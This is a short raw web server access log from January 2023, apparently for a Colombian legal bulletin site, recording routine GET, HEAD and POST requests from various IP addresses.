172.22.2.4 - - [07/Jan/2023:21:48:07 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
201.245.192.253 - - [07/Jan/2023:21:48:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:21:47:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:48:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
216.245.221.92 - - [07/Jan/2023:21:51:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:52:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [07/Jan/2023:21:53:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 200 25737
201.245.192.253 - - [07/Jan/2023:21:53:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
173.252.127.8 - - [07/Jan/2023:21:53:46 -0500] "GET /secretaria-de-ambiente-reconocio-las-234-empresas-y-entidades-con-mejores-estrategias-de-gestion-ambiental.html?fbclid=IwAR1B68S4J0xy2hRpgYhBfTal0EHi5Ybg0rQrHDkaNyEZh1juvCmuGbgRkQQ HTTP/1.1" 200 1048
172.22.2.4 - - [07/Jan/2023:21:53:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:54:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
216.245.221.92 - - [07/Jan/2023:21:56:10 -0500] "HEAD / HTTP/1.1" 200 -
138.0.119.149 - - [07/Jan/2023:21:57:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
138.0.119.149 - - [07/Jan/2023:21:57:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
138.0.119.149 - - [07/Jan/2023:21:57:04 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.116.231.67 - - [07/Jan/2023:21:57:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 406613
201.245.192.253 - - [07/Jan/2023:21:58:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
